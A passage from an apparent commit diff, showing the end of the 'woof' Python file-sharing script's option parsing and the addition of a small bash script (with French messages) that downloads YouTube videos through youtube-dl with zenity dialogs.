When a directory is specified, a tar archive gets served. By default
it is gzip compressed. You can specify -z for gzip compression,
-j for bzip2 compression, -Z for ZIP compression or -u for no compression.
You can configure your default compression method in the configuration
file described below.
When -s is specified instead of a filename, %s distributes itself.
defaults: count = %d, port = %d
You can specify different defaults in two locations: /etc/woofrc
and ~/.woofrc can be INI-style config files containing the default
port and the default count. The file in the home directory takes
precedence. The compression methods are "off", "gz", "bz2" or "zip".
Sample file:
[main]
port = 8008
count = 2
ip = 127.0.0.1
compressed = gz
""" % (name, name, name, name, defmaxdown, defport)
if errmsg:
print >>sys.stderr, errmsg
print >>sys.stderr
sys.exit (1)
def main ():
global cpid, compressed
maxdown = 1
port = 8080
ip_addr = ''
config = ConfigParser.ConfigParser()
config.read (['/etc/woofrc', os.path.expanduser('~/.woofrc')])
if config.has_option ('main', 'port'):
port = config.getint ('main', 'port')
if config.has_option ('main', 'count'):
maxdown = config.getint ('main', 'count')
if config.has_option ('main', 'ip'):
ip_addr = config.get ('main', 'ip')
if config.has_option ('main', 'compressed'):
formats = { 'gz' : 'gz',
'true' : 'gz',
'bz' : 'bz2',
'bz2' : 'bz2',
'zip' : 'zip',
'off' : '',
'false' : '' }
compressed = config.get ('main', 'compressed')
compressed = formats.get (compressed, 'gz')
defaultport = port
defaultmaxdown = maxdown
try:
options, filenames = getopt.getopt (sys.argv[1:], "hszjZui:c:p:")
except getopt.GetoptError, desc:
usage (defaultport, defaultmaxdown, desc)
for option, val in options:
if option == '-c':
try:
maxdown = int (val)
if maxdown <= 0:
raise ValueError
except ValueError:
usage (defaultport, defaultmaxdown,
"invalid download count: %r. "
"Please specify an integer >= 0." % val)
elif option == '-i':
ip_addr = val
elif option == '-p':
try:
port = int (val)
except ValueError:
usage (defaultport, defaultmaxdown,
"invalid port number: %r. Please specify an integer" % val)
elif option == '-s':
filenames.append (__file__)
elif option == '-h':
usage (defaultport, defaultmaxdown)
elif option == '-z':
compressed = 'gz'
elif option == '-j':
compressed = 'bz2'
elif option == '-Z':
compressed = 'zip'
elif option == '-u':
compressed = ''
else:
usage (defaultport, defaultmaxdown, "Unknown option: %r" % option)
if len (filenames) == 1:
filename = os.path.abspath (filenames[0])
else:
usage (defaultport, defaultmaxdown,
"Can only serve single files/directories.")
if not os.path.exists (filename):
usage (defaultport, defaultmaxdown,
"%s: No such file or directory" % filenames[0])
if not (os.path.isfile (filename) or os.path.isdir (filename)):
usage (defaultport, defaultmaxdown,
"%s: Neither file nor directory" % filenames[0])
serve_files (filename, maxdown, ip_addr, port)
# wait for child processes to terminate
if cpid != 0:
try:
while 1:
os.wait ()
except OSError:
pass
if __name__=='__main__':
try:
main ()
except KeyboardInterrupt:
pass

45
youtube.sh Executable file
View File

@ -0,0 +1,45 @@
#!/bin/bash
# Convenience script for YouTube downloads
# zenity command
ZENITY="/usr/bin/zenity --title YouTube "
# target directory
DL_DIR="$HOME/Téléchargements/youtube"
# download command, wrapped in a function so the output template is
# quoted correctly (keeping it in a string would pass literal quotes)
youtube_dl() {
/usr/bin/youtube-dl -o "$DL_DIR/%(stitle)s.%(ext)s" --prefer-free-formats "$@"
}
# Create the target directory if needed
mkdir -p "$DL_DIR"
if [ ! $? -eq 0 ] ; then
echo "Impossible de créer $DL_DIR" >&2
DL_DIR=$HOME
fi
# dialog box asking for the video URL
VIDEO_URL=$($ZENITY --entry --text "Adresse de la vidéo" --width=600)
echo "$VIDEO_URL"
if [ -z "$VIDEO_URL" ] ; then
# no URL given
$ZENITY --error --text "Aucune vidéo à télécharger"
else
# name of the file that will be created
FILENAME=$(youtube_dl --get-filename "$VIDEO_URL")
if [ $? -eq 0 ] ; then
$ZENITY --info --text "Téléchargement en cours" &
else
$ZENITY --error --text "Erreur de téléchargement"
exit 1
fi
echo "youtube-dl: $VIDEO_URL"
youtube_dl "$VIDEO_URL"
if [ $? -eq 0 ] ; then
echo "Ouverture: $FILENAME"
/usr/bin/nautilus "$FILENAME"
else
$ZENITY --error --text "Erreur de téléchargement"
fi
fi